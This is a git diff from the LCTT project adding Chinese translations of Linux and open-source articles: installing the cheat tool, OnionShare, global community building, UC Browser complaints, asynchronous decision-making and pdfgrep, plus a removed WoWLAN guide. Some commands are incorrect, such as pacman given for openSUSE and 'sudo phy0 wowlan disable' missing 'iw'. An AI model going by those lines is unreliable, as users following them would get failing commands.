**`RHEL/CentOS`** 官方仓库中没有 pip,因此使用[ EPEL 仓库][5],并使用[ YUM 命令][6]安装 pip。
|
||||
|
||||
```
|
||||
|
||||
@ -50,62 +39,61 @@ enable [EPEL Repository][5] and use [YUM command][6] to install pip.
|
||||
|
||||
```
|
||||
|
||||
For **`Fedora`** system, use [dnf Command][7] to install pip.
|
||||
对于 **`Fedora`** 系统,使用[ dnf 命令][7]来安装 pip。
|
||||
|
||||
```
|
||||
|
||||
[For Python2]
|
||||
[对于 Python2]
|
||||
|
||||
|
||||
$ sudo dnf install python-pip
|
||||
|
||||
|
||||
|
||||
[For Python3]
|
||||
[对于 Python3]
|
||||
|
||||
|
||||
$ sudo dnf install python3
|
||||
|
||||
```
|
||||
|
||||
For **`Arch Linux`** based systems, use [Pacman Command][8] to install pip.
|
||||
对于基于 **`Arch Linux`** 的系统,请使用[ Pacman 命令][8] 来安装 pip。
|
||||
|
||||
```
|
||||
|
||||
[For Python2]
|
||||
[对于 Python2]
|
||||
|
||||
|
||||
$ sudo pacman -S python2-pip python-setuptools
|
||||
|
||||
|
||||
|
||||
[For Python3]
|
||||
[对于 Python3]
|
||||
|
||||
|
||||
$ sudo pacman -S python-pip python3-setuptools
|
||||
|
||||
```
|
||||
|
||||
For **`openSUSE`** system, use [Zypper Command][9] to install pip.
|
||||
对于 **`openSUSE`** 系统,使用[ Zypper 命令][9]来安装 pip。
|
||||
|
||||
```
|
||||
|
||||
[For Python2]
|
||||
[对于 Python2]
|
||||
|
||||
|
||||
$ sudo pacman -S python-pip
|
||||
|
||||
|
||||
|
||||
[For Python3]
|
||||
[对于 Python3]
|
||||
|
||||
|
||||
$ sudo pacman -S python3-pip
|
||||
|
||||
```
|
||||
|
||||
pip is a python module bundled with setuptools, it's one of the recommended
|
||||
tool for installing Python packages in Linux.
|
||||
pip 是一个与 setuptools 捆绑在一起的 Python 模块,它是在 Linux 中安装 Python 包推荐的工具之一。
|
||||
|
||||
```
|
||||
|
||||
@ -113,10 +101,9 @@ tool for installing Python packages in Linux.
|
||||
|
||||
```
|
||||
|
||||
#### How to Use Cheat
|
||||
#### 如何使用 Cheat
|
||||
|
||||
Run `cheat` followed by corresponding `command` to view the cheatsheet, For
|
||||
demonstration purpose, we are going to check about `tar` command examples.
|
||||
运行 `cheat`,然后按相应的`命令`来查看 cheatsheet,作为例子,我们要来看下 `tar` 命令的例子。
|
||||
|
||||
```
|
||||
|
||||
@ -158,7 +145,7 @@ demonstration purpose, we are going to check about `tar` command examples.
|
||||
|
||||
```
|
||||
|
||||
Run the following command to see what cheatsheets are available.
|
||||
运行下面的命令查看可用的 cheatsheet。
|
||||
|
||||
```
|
||||
|
||||
@ -166,7 +153,7 @@ Run the following command to see what cheatsheets are available.
|
||||
|
||||
```
|
||||
|
||||
Navigate to help page for more details.
|
||||
进入帮助页面获取更多详细信息。
|
||||
|
||||
```
|
||||
|
||||
@ -180,7 +167,7 @@ Navigate to help page for more details.
|
||||
via: https://www.2daygeek.com/cheat-a-collection-of-practical-linux-command-examples/
|
||||
|
||||
作者:[Magesh Maruthamuthu][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
@ -0,0 +1,77 @@
|
||||
OnionShare - 匿名共享文件
|
||||
======
|
||||
在这个数字世界中,我们通过互联网使用 Dropbox、Mega、Google Drive 等不同云存储分享我们的媒体、文档和重要文件。但是每个云存储都有两个主要问题,一个是大小和另一个安全。习惯 Bit Torrent 之后,大小已经不是问题了,但安全性仍旧是。
|
||||
|
||||
你即使通过安全云服务发送文件,公司也会注意到这些文件,如果这些文件是保密的,政府甚至可以拥有它们。因此,为了克服这些问题,我们使用 OnionShare,如它的名字那样它使用洋葱网络也就是 Tor 来匿名分享文件给任何人。
|
||||
|
||||
### 如何使用 **OnionShare**?
|
||||
|
||||
* 首先下载 [OnionShare][1] 和 [Tor浏览器][2]。下载后安装它们。
|
||||
|
||||
|
||||
|
||||
[![install onionshare and tor browser][3]][3]
|
||||
|
||||
* 现在从开始菜单打开 OnionShare
|
||||
|
||||
|
||||
|
||||
[![onionshare share files anonymously][4]][4]
|
||||
|
||||
* 点击添加并添加一个文件/文件夹共享。
|
||||
* 点击开始分享。它会产生一个 .onion 网址,你可以与你的收件人分享这个网址。
|
||||
|
||||
|
||||
|
||||
[![share file with onionshare anonymously][5]][5]
|
||||
|
||||
* 从 URL 下载文件,复制 URL 并打开 Tor 浏览器并粘贴。打开 URL 并下载文件/文件夹。
|
||||
|
||||
|
||||
|
||||
[![receive file with onionshare anonymously][6]][6]
|
||||
|
||||
### **OnionShare** 的开始
|
||||
|
||||
几年前,Glenn Greenwald 发现他从 Edward Snowden 收到的一些 NSA 的文件已经被损坏。但他需要文件,并决定通过使用 USB 获取文件。这并不成功。
|
||||
|
||||
在阅读了 Greenwald 写的书后,The Intercept 的安全专家 Micah Lee 发布了 OnionShare - 一个简单的免费软件,可以匿名和安全地共享文件。他创建了一个程序,通过一个被匿名软件 Tor 加密和保护的直接通道来共享大数据转储,使窃取者难以获取文件。
|
||||
|
||||
### **OnionShare** 如何工作?
|
||||
|
||||
OnionShare 在 127.0.0.1 上启动了一个 Web 服务器,用于在随机端口上共享文件。它从有 6880 个单词的单词列表中选择任意两个单词,称为 slug。它使服务器可以作为 Tor 洋葱服务发送文件。最终的 URL 看起来像这样:
|
||||
|
||||
`http://qx2d7lctsnqwfdxh.onion/subside-durable`
|
||||
|
||||
OnionShare 在下载后关闭。有一个选项允许多次下载文件。这使得该文件不再在互联网上可以得到。
|
||||
|
||||
### 使用 **OnionShare** 好处
|
||||
|
||||
其他网站或程序可以访问你的文件:发件人使用 OnionShare 共享的文件不存储在任何服务器上。它直接托管在发件人的系统上。
|
||||
|
||||
没有人可以窥探共享文件:由于用户之间的连接是由洋葱服务和 Tor 浏览器加密的。这使得连接安全,很难窃取文件。
|
||||
|
||||
用户双方都是匿名的:OnionShare 和 Tor 浏览器使发件人和收件人匿名。
|
||||
|
||||
### 结论
|
||||
|
||||
在这篇文章中,我已经解释了如何**匿名分享你的文档、文件**。我也解释了它是如何工作的。希望你了解 OnionShare 是如何工作的,如果你对任何事情仍有疑问,只需留言。
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.theitstuff.com/onionshare-share-files-anonymously-2
|
||||
|
||||
作者:[Anirudh Rayapeddi][a]
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.theitstuff.com
|
||||
[1]https://onionshare.org/
|
||||
[2]https://www.torproject.org/projects/torbrowser.html.en
|
||||
[3]http://www.theitstuff.com/wp-content/uploads/2017/12/Icons.png
|
||||
[4]http://www.theitstuff.com/wp-content/uploads/2017/12/Onion-Share.png
|
||||
[5]http://www.theitstuff.com/wp-content/uploads/2017/12/With-Link.png
|
||||
[6]http://www.theitstuff.com/wp-content/uploads/2017/12/Tor.png
|
@ -0,0 +1,70 @@
|
||||
构建全球社区带来的挑战
|
||||
======
|
||||
![配图 ](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_community2.png?itok=1blC7-NY)
|
||||
|
||||
今天的开源组织参与人员来自于全世界。你能预见到组建在线社区可能遇到哪些困难吗?有没有什么办法能够克服这些困难呢?
|
||||
|
||||
为开源社区贡献力量的人共同合作推动软件的开发和发展 (People contributing to an open source community share a commitment to the software they're helping to develop)。在过去,人们是面对面或者通过邮件和电话来交流的。今天,科技孕育出了在线交流--人们只需要进入一个聊天室或消息渠道就能一起工作了。比如,你可以早上跟摩洛哥的人一起工作,到了晚上又跟夏威夷的人一起工作。
|
||||
|
||||
## 全球社区的三个挑战
|
||||
|
||||
任何一个团队合作过的人都知道意见分歧是很难被克服的。对于在线社区来说,语言障碍,不同的时区,以及文化差异也带来了新的挑战。
|
||||
|
||||
### 语言障碍
|
||||
|
||||
英语是开源社区中的主流语言,因此英语不好的人会很难看懂文档和修改意见。为了克服这个问题,吸引其他地区的社区成员,你需要邀请双语者参与到社区中来。问问周围的人--你会发现意想不到的精通其他语言的人。社区的双语成员可以帮助别人跨越语言障碍,并且可以通过翻译软件和文档来扩大项目的受众范围。
|
||||
|
||||
人们使用的编程语言也不一样。你可能喜欢用 Bash 而其他人则可能更喜欢 Python,Ruby,C 等其他语言。这意味着,人们可能由于编程语言的原因而难以为你的代码库做贡献。项目负责人为项目选择一门被软件社区广泛认可的语言至关重要。如果你选择了一门偏门的语言,则很少人能够参与其中。
|
||||
|
||||
### 不同的时区
|
||||
|
||||
时区为开源社区带来了另一个挑战。比如,若你在芝加哥,想与一个在伦敦的成员安排一次视频会议,你需要调整 8 小时的时差。根据合作者的地理位置,你可能要在深夜或者清晨工作。
|
||||
|
||||
肉体转移 (Physical sprints),让你的团队在同一个时区工作可以帮助克服这个挑战,但这中方法只有极少数社区才能够负担的起。我们还可以定期举行虚拟会议讨论项目,建立一个固定的时间和地点以供所有人来讨论未决的事项,即将发布的版本等其他主题。
|
||||
|
||||
不同的时区也可以成为你的优势,因为团队成员可以全天候的工作。若你拥有一个类似 IRC 这样的实时交流平台,用户可以在任意时间都能找到人来回答问题。
|
||||
|
||||
### 文化差异
|
||||
|
||||
文化差异是开源组织面临的最大挑战。世界各地的人都有不同的思考方式,计划以及解决问题的方法。政治环境也会影响工作环境并影响决策。
|
||||
|
||||
作为项目负责人,你应该努力构建一种能包容不同看法的环境。文化差异可以鼓励社区沟通。建设性的讨论总是对项目有益,因为它可以帮助社区成员从不同角度看待问题。不同意见也有助于解决问题。
|
||||
|
||||
要成功开源,团队必须学会拥抱差异。这不简单,但多样性最终会使社区收益。
|
||||
|
||||
## 加强在线沟通的其他方法
|
||||
|
||||
**本地化:** 在线社区成员可能会发现位于附近的贡献者--去见个面并组织一个本地社区。只需要两个人就能组建一个社区了。可以邀请其他当地用户或雇员参与其中; 他们甚至还能为以后的聚会提供场所呢。
|
||||
|
||||
**组织活动:** 组织活动是构建本地社区的好方法,而且费用也不高。你可以在当地的咖啡屋或者啤酒厂聚会,庆祝最新版本的发布或者某个核心功能的实现。组织的活动越多,人们参与的热情就越高(即使只是因为单纯的好奇心)。最终,可能会找到一家公司为你提供聚会的场地,或者为你提供赞助。
|
||||
|
||||
**保持联系:** 每次活动后,联系本地社区成员。收起电子邮箱地址或者其他联系方式并邀请他们参与到你的交流平台中。邀请他们为其他社区做贡献。你很可能会发现很多当地的人才,运气好的话,甚至可能发现新的核心开发人员!
|
||||
|
||||
**分享经验:** 本地社区是一种非常有价值的资源,对你,对其他社区来说都是。与可能受益的人分享你的发现和经验。如果你不清楚(译者注:这里原文是说 sure,但是根据上下文,这里应该是 not sure) 如何策划一场活动或会议,可以咨询其他人的意见。也许能找到一些有经验的人帮你走到正轨。
|
||||
|
||||
**关注文化差异:** 记住,文化规范因地点和人口而异,因此在清晨安排某项活动可能适用于一个地方的人,但是不合适另一个地方的人。当然,你可以--也应该--利用其他社区的参考资料来更好地理解这种差异性,但有时你也需要通过试错的方式来学习。不要忘了分享你所学到的东西,让别人也从中获益。
|
||||
|
||||
**检查个人观点:** 避免在工作场合提出带有很强主观色彩的观点(尤其是与政治相关的观点)。这会抑制开放式的沟通和问题的解决。相反,应该专注于鼓励与团队成员展开建设性讨论。如果你发现陷入了激烈的争论中,那么后退一步,冷静一下,然后再从更加积极的角度出发重新进行讨论。讨论必须是有建设性的,从多个角度讨论问题对社区有益。永远不要把自己的主观观念放在社区的总体利益之前。
|
||||
|
||||
**尝试异步沟通:** 这些天,实时通讯平台已经引起了大家的关注,但除此之外还别忘了电子邮件。如果没有在网络平台上找到人的话,可以给他们发送一封电子邮件。有可能你很快就能得到回复。考虑使用那些专注于异步沟通的平台,比如 [Twist][1],也不要忘了查看并更新论坛和维基。
|
||||
|
||||
**使用不同的解决方案:** 并不存在一个单一的完美的解决方法,学习最有效的方法还是通过经验来学习。从反复试验中你可以学到很多东西。不要害怕失败; 你慧聪失败中学到很多东西从而不停地进步。
|
||||
|
||||
## 社区需要营养
|
||||
|
||||
将社区想象成是一颗植物的幼苗。你需要每天给它浇水,提供阳光和氧气。社区也是一样:倾听贡献者的声音,记住你在与活生生的人进行互动,他们需要以合适的方式进行持续的交流。如果社区缺少了人情味,人们会停止对它的贡献。
|
||||
|
||||
最后,请记住,每个社区都是不同的,没有一种单一的解决方法能够适用于所有社区。坚持不断地从社区中学习并适应这个社区。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/12/working-worldwide-communities
|
||||
|
||||
作者:[José Antonio Rey][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/jose
|
||||
[1]:https://twistapp.com
|
@ -0,0 +1,65 @@
|
||||
UC 浏览器最大的问题
|
||||
======
|
||||
在我们开始谈论缺点之前,我要確定的事实是过去 3 年来,我一直是一个忠实的 UC 浏览器用户。我真的很喜欢它的下载速度,超时尚的用户界面和工具上引人注目的图标。我一开始是 Android 上的 Chrome 用户,但我在朋友的推荐下开始使用 UC。但在过去的一年左右,我看到了一些东西让我重新思考我的选择,现在我感觉我要重新回到 Chrome。
|
||||
|
||||
### 不需要的 **通知**
|
||||
|
||||
我相信我不是唯一一个每几个小时内就收到这些不需要的通知的人。这些欺骗点击文章真的很糟糕,最糟糕的部分是你每隔几个小时就会收到一次。
|
||||
|
||||
[![uc browser's annoying ads notifications][1]][1]
|
||||
|
||||
我试图从通知设置里关闭他们,但它们仍然以一个更低频率出现。
|
||||
|
||||
### **新闻主页**
|
||||
|
||||
另一个不需要的部分是完全无用的。我们完全理解 UC 浏览器是免费下载,可能需要资金,但并不应该这么做。这个主页上的新闻文章是非常让人分心且不需要的。有时当你在一个专业或家庭环境中的一些诱骗点击甚至可能会导致尴尬。
|
||||
|
||||
[![uc browser's embarrassing news homepage][2]][2]
|
||||
|
||||
而且他们甚至有这样的设置。将 **UC** **新闻显示打开/关闭**。我也试过,猜猜看发生了什么。在下图中,左侧你可以看到我的尝试,右侧可以看到结果。
|
||||
|
||||
[![uc browser homepage settings][3]][3]
|
||||
|
||||
而且不止诱骗点击新闻,他们已经开始添加一些不必要的功能。所以我也列出它们。
|
||||
|
||||
### UC **音乐**
|
||||
|
||||
UC 浏览器在浏览器中集成了一个**音乐播放器**来播放音乐。它只是能用,没什么特别的东西。那为什么还要呢?有什么原因呢?谁需要浏览器中的音乐播放器?
|
||||
|
||||
[![uc browser adds uc music player][4]][4]
|
||||
|
||||
它甚至不是在后台直接播放来自网络的音频。相反,它是一个播放离线音乐的音乐播放器。所以为什么要它?我的意思是,它甚至不够好到作为主要音乐播放器。即使它是,它不能独立于 UC 浏览器运行。所以为什么会有人运行将他/她的浏览器只是为了使用你的音乐播放器?
|
||||
|
||||
### **快速**访问栏
|
||||
|
||||
我已经看到平均有 90% 的用户在通知区域挂着这栏,因为它默认安装,并且它们不知道如何摆脱它。右侧的设置可以摆脱它。
|
||||
|
||||
[![uc browser annoying quick access bar][5]][5]
|
||||
|
||||
但是我还是想问一下,“为什么它是默认的?”。这让大多数用户很头痛。如果我们需要它,就会去启用它。为什么要强迫用户。
|
||||
|
||||
### 总结
|
||||
|
||||
UC 浏览器仍然是最大的玩家之一。它提供了一个最好的体验,但是,我不知道 UC 通过在浏览中打包进将越来越多的功能并强迫用户使用它们是要证明什么。
|
||||
|
||||
我喜欢 UC 的速度和设计。但最近的体验导致我再次考虑我的主要浏览器。
|
||||
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.theitstuff.com/biggest-problems-uc-browser
|
||||
|
||||
作者:[Rishabh Kandari][a]
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.theitstuff.com/author/reevkandari
|
||||
[1]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-6.png
|
||||
[2]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-1-1.png
|
||||
[3]:http://www.theitstuff.com/wp-content/uploads/2017/12/uceffort.png
|
||||
[4]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-3-1.png
|
||||
[5]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-4-1.png
|
||||
|
@ -0,0 +1,56 @@
|
||||
异步决策:帮助远程团队走向成功
|
||||
======
|
||||
异步决策能够让地理和文化上分散的软件团队更有效率地做出决策。本文就将讨论一下实现异步决策所需要的一些原则和工具。
|
||||
|
||||
同步决策,要求参与者实时地进行互动,而这对那些需要大块完整时间工作 ([Maker's Schedule][1]) 的人来说代价非常大,而且对于远程团队来说这也不现实。我们会发现这种会议最后浪费的时间让人难以置信。
|
||||
|
||||
相比之下,异步决策常应用于大型开源项目中(比如我常参与的像 Apache Software Foundation (ASF))。它为团队提供了一种尽可能少开会的有效方法。很多开源项目每年只开很少的几次会议(有的甚至完全没开过会),然而开发团队却始终如一地在生产高质量的软件。
|
||||
|
||||
怎样才能异步决策呢?
|
||||
|
||||
## 所需工具
|
||||
|
||||
### 中心化的异步沟通渠道
|
||||
|
||||
异步决策的第一步就是构建一个中心化的异步沟通渠道。你所使用的技术必须能让所有的团队成员都获得同样的信息,并能进行线索讨论 (threaded discussions),也就是说你要既能对一个主题进行发散也要能封禁其他主题的讨论。想一想 marine 广播,其中广播渠道的作用只是为了引起特定人员的注意,这些人然后再创建一个子渠道来进行详细的讨论。
|
||||
|
||||
很多开源项目依旧使用邮件列表 (mailing lists) 作为中心渠道,不过很多新一代的软件开发者可能会觉得这个方法又古老有笨拙。邮件列表需要遵循大量的准则才能有效的管理热门项目,比如你需要进行有意义的引用,每个 thead 只讨论一个主题,保证 [标题与内容相吻合 ][2]。虽然这么麻烦,但使用得当的话,再加上一个经过索引的归档系统,邮件列表依然在创建中心渠道的工具中占据绝对主导的地位。
|
||||
|
||||
公司团队可以从一个更加现代化的协作工具中收益,这类工具更易使用并提供了更加强大的多媒体功能。不管你用的是哪个工具,关键在于要创建一个能让大量的人员有效沟通并异步地讨论各种主题的渠道。要创建一个一致而活跃的社区,使用一个 [繁忙的渠道要好过建立多个渠道 ][3] to create a consistent and engaged community。
|
||||
|
||||
### 构建共识的机制
|
||||
|
||||
第二个工具是一套构建共识的机制,这样你才不会陷入死循环从而确保能做出决策。做决策最理想的情况就是一致同意,而次佳的就是达成共识,也就是 "有决策权的人之间广泛形成了一致的看法"。强求完全一致的赞同或者允许一票否决都会阻碍决策的制定,因此 ASF 中只在非常有限的决策类似中允许否决权。[ASF 投票制度 ][4] 为类似 ASF 这样没有大老板的松散组织构建了一个久经考验的,用于达成共识的好方法。当共识无法自然产生时也可以使用该套制度。
|
||||
|
||||
### 案例管理系统
|
||||
|
||||
如上所述,我们通常在项目的中心渠道中构建共识。但是在讨论一些复杂的话题时,使用案例管理系统这一第三方的工具很有意义。小组可以使用中心渠道专注于非正式的讨论和头脑风暴上,当讨论要转变成一个决策时将其转到一个更加结构化的案例管理系统中去。
|
||||
|
||||
案例管理系统能够更精确地组织决策。小型团队不用做太多决策可以不需要它,但很多团队会发现能有一个相对独立的地方讨论决策的细节并保存相关信息会方便很多。
|
||||
|
||||
案例管理系统不一定就是个很复杂的软件; 在 ASF 中我们所使用的只是简单的问题跟踪软件而已,这些给予 web 的系统原本是创建来进行软件支持和 bug 管理的。每个案例列在一个单独的 web 页面上,还有一些历史的注释和动作信息。该途径可以很好的追踪决策是怎么制定出来的。比如,某些非紧急的决策或者复杂的决策可能会花很长时间才会制定出来,这时有一个地方能够了解这些决策的历史就很有用了。新来的团队成员也能很快地了解到最近做出了哪些决策,哪些决策还在讨论,每个决策都有那些人参与其中,每个决策的背景是什么。
|
||||
|
||||
## 成功的案例
|
||||
|
||||
ASF 董事会中的九名懂事在每个月的电话会议上只做很少的一些决策,耗时不超过 2 个小时。在准备这些会议之前大多数的决策都预先通过异步的方式决定好了。这使得我们可以在会议上集中讨论复杂和难以确定的问题,而不是他论那些已经达成普遍/部分共识的问题上。
|
||||
|
||||
软件世界外的一个有趣的案例是 [瑞士联邦委员会的周会 ][5],它的运作方式跟 ASF 很类似。团队以异步决策构建共识的方式来准备会议。会议议程由一组不同颜色编码的列表组成,这些颜色标识了那些事项可以很快通过批准,那些事项需要进一步的讨论,哪些事项特别的复杂。这使得只要 7 个人就能每年忙完超过 2500 项决策,共 50 个周会,每个周会只需要几个小时时间。我觉得这个效率已经很高了。
|
||||
|
||||
就我的经验来看,异步决策带来的好处完全值得上为此投入的时间和工具。而且它也能让团队成员更快乐,这也是成功的关键因素之一。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/12/asynchronous-decision-making
|
||||
|
||||
作者:[Bertrand Delacretaz][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com
|
||||
[1]:http://www.paulgraham.com/makersschedule.html
|
||||
[2]:https://grep.codeconsult.ch/2017/11/10/large-mailing-lists-survival-guide/
|
||||
[3]:https://grep.codeconsult.ch/2011/12/06/stefanos-mazzocchis-busy-list-pattern/
|
||||
[4]:http://www.apache.org/foundation/voting.html
|
||||
[5]:https://www.admin.ch/gov/en/start/federal-council/tasks/decision-making/federal-council-meeting.html
|
@ -0,0 +1,64 @@
|
||||
如何使用 pdfgrep 从终端搜索 PDF 文件
|
||||
======
|
||||
诸如 [grep][1] 和 [ack-grep][2] 之类的命令行工具对于搜索匹配指定[正则表达式][3]的纯文本非常有用。但是你有没有试过使用这些工具在 PDF 中搜索模板?不要这么做!由于这些工具无法读取PDF文件,因此你不会得到任何结果。他们只能读取纯文本文件。
|
||||
|
||||
顾名思义,[pdfgrep][4] 是一个小的命令行程序,可以在不打开文件的情况下搜索 PDF 中的文本。它非常快速 - 比几乎所有 PDF 浏览器提供的搜索更快。grep 和 pdfgrep 的区别在于 pdfgrep 对页进行操作,而 grep 对行操作。grep 如果在一行上找到多个匹配项,它也会多次打印单行。让我们看看如何使用该工具。
|
||||
|
||||
对于 Ubuntu 和其他基于 Ubuntu 的 Linux 发行版来说,这非常简单:
|
||||
```
|
||||
sudo apt install pdfgrep
|
||||
```
|
||||
|
||||
对于其他发行版,只要将 `pdfgrep` 作为[包管理器][5]的输入,它就应该能够安装。万一你想浏览代码,你也可以查看项目的[ GitLab 页面][6]。
|
||||
|
||||
现在你已经安装了这个工具,让我们去测试一下。pdfgrep 命令采用以下格式:
|
||||
```
|
||||
pdfgrep [OPTION...] PATTERN [FILE...]
|
||||
```
|
||||
|
||||
**OPTION** 是一个额外的属性列表,给出诸如 `-i` 或 `--ignore-case` 这样的命令,这两者都会忽略匹配正则中的大小写。
|
||||
|
||||
**PATTERN** 是一个扩展的正则表达式。
|
||||
|
||||
**FILE** 如果它在相同的工作目录或文件的路径,这是文件的名称。
|
||||
|
||||
我根据官方文档用 Python 3.6 运行命令。下图是结果。
|
||||
|
||||
![pdfgrep search][7]
|
||||
|
||||
![pdfgrep search][7]
|
||||
|
||||
红色高亮显示所有遇到单词 “queue” 的地方。在命令中加入 `-i` 选项将会匹配单词 “Queue”。请记住,当加入 `-i` 时,大小写并不重要。
|
||||
|
||||
pdfgrep 有相当多的有趣的选项。不过,我只会在这里介绍几个。
|
||||
|
||||
|
||||
* `-c` 或者 `--count`:这会抑制匹配的正常输出。它只显示在文件中遇到该单词的次数,而不是显示匹配的长输出,
|
||||
* `-p` 或者 `--page-count`:这个选项打印页面上匹配的页码和页面上的模式出现次数
|
||||
* `-m` 或者 `--max-count` [number]:指定匹配的最大数目。这意味着当达到匹配次数时,该命令停止读取文件。
|
||||
|
||||
|
||||
|
||||
支持的选项的完整列表可以在 man 页面或者 pdfgrep 在线[文档][8]中找到。以防你在处理一些批量文件,不要忘记,pdfgrep 可以同时搜索多个文件。可以通过更改 GREP_COLORS 环境变量来更改默认的匹配高亮颜色。
|
||||
|
||||
下一次你想在 PDF 中搜索一些东西。请考虑使用 pdfgrep。该工具会派上用场,并且节省你的时间。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.maketecheasier.com/search-pdf-files-pdfgrep/
|
||||
|
||||
作者:[Bruno Edoh][a]
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.maketecheasier.com
|
||||
[1] https://www.maketecheasier.com/what-is-grep-and-uses/
|
||||
[2] https://www.maketecheasier.com/ack-a-better-grep/
|
||||
[3] https://www.maketecheasier.com/the-beginner-guide-to-regular-expressions/
|
||||
[4] https://pdfgrep.org/
|
||||
[5] https://www.maketecheasier.com/install-software-in-various-linux-distros/
|
||||
[6] https://gitlab.com/pdfgrep/pdfgrep
|
||||
[7] https://www.maketecheasier.com/assets/uploads/2017/11/pdfgrep-screenshot.png (pdfgrep search)
|
||||
[8] https://pdfgrep.org/doc.html
|
@ -1,116 +0,0 @@
|
||||
如何为 Linux 无线网卡配置无线唤醒功能
|
||||
======
|
||||
[![linux-configire-wake-on-wireless-lan-wowlan][1]][1]
|
||||
无线唤醒 (WoWLAN or WoW) 允许 Linux 系统进入低耗电模式的情况下保持无线网卡处于激活状态依然与热点连接。这篇教程演示了如何在一台安装无线网卡的 Linux 笔记本或桌面电脑上启用 WoWLAN / WoW 模式。
|
||||
|
||||
请注意,不是所有的无线网卡和 Linux 驱动程序都支持 WoWLAN。
|
||||
|
||||
## 语法
|
||||
|
||||
在 Linux 系统上,你需要使用 iw 命令来查看和操作无线设备及其配置。 其 syntax 为:
|
||||
```
|
||||
iw command
|
||||
iw [options] command
|
||||
```
|
||||
|
||||
## 列出所有的无线设备及其功能
|
||||
|
||||
输入下面命令:
|
||||
```
|
||||
$ iw list
|
||||
$ iw list | more
|
||||
$ iw dev
|
||||
```
|
||||
输出为:
|
||||
```
|
||||
phy#0
|
||||
Interface wlp3s0
|
||||
ifindex 3
|
||||
wdev 0x1
|
||||
addr 6c:88:14:ff:36:d0
|
||||
type managed
|
||||
channel 149 (5745 MHz),width: 40 MHz, center1: 5755 MHz
|
||||
txpower 15.00 dBm
|
||||
|
||||
```
|
||||
|
||||
请记下这个 phy0。
|
||||
|
||||
## 查看 wowlan 的当前状态
|
||||
|
||||
打开终端并输入下面命令来查看无线网络的状态:
|
||||
```
|
||||
$ iw phy0 wowlan show
|
||||
```
|
||||
输出为:
|
||||
```
|
||||
WoWLAN is disabled
|
||||
```
|
||||
|
||||
## 如何启用 wowlan
|
||||
|
||||
启用的语法为:
|
||||
`sudo iw phy {phyname} wowlan enable {option}`
|
||||
其中,
|
||||
|
||||
1。{phyname} - 使用 iw dev 来获取 phy 的名字。
|
||||
2。{option} - 可以是 any, disconnect, magic-packet 等。
|
||||
|
||||
|
||||
|
||||
比如,我想为 phy0 开启 wowlan:
|
||||
`$ sudo iw phy0 wowlan enable any`
|
||||
或者
|
||||
`$ sudo iw phy0 wowlan enable magic-packet disconnect`
|
||||
检查一下:
|
||||
`$ iw phy0 wowlan show`
|
||||
结果为:
|
||||
```
|
||||
WoWLAN is enabled:
|
||||
* wake up on disconnect
|
||||
* wake up on magic packet
|
||||
|
||||
```
|
||||
|
||||
## 测试一下
|
||||
|
||||
将你的笔记本挂起或者进入休眠模式,然后从 NAS 服务器上发送 ping 请求或 magic packet:
|
||||
`$ sudo sh -c 'echo mem > /sys/power/state'`
|
||||
从 NAS 服务器上使用 [ping command][3] 发送 ping 请求
|
||||
`$ ping your-laptop-ip`
|
||||
也可以 [使用 wakeonlan 命令发送 magic packet][4]:
|
||||
```
|
||||
$ wakeonlan laptop-mac-address-here
|
||||
$ etherwake MAC-Address-Here
|
||||
```
|
||||
|
||||
## 如何禁用 WoWLAN?
|
||||
|
||||
语法为:
|
||||
```
|
||||
$ sudo phy {phyname} wowlan disable
|
||||
$ sudo phy0 wowlan disable
|
||||
```
|
||||
|
||||
更多信息请阅读 iw 命令的 man 页:
|
||||
```
|
||||
$ man iw
|
||||
$ iw --help
|
||||
```
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.cyberciti.biz/faq/configure-wireless-wake-on-lan-for-linux-wifi-wowlan-card/
|
||||
|
||||
作者:[Vivek Gite][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://twitter.com/nixcraft
|
||||
[1] https://www.cyberciti.biz/media/new/faq/2017/12/linux-configire-wake-on-wireless-lan-wowlan.jpg
|
||||
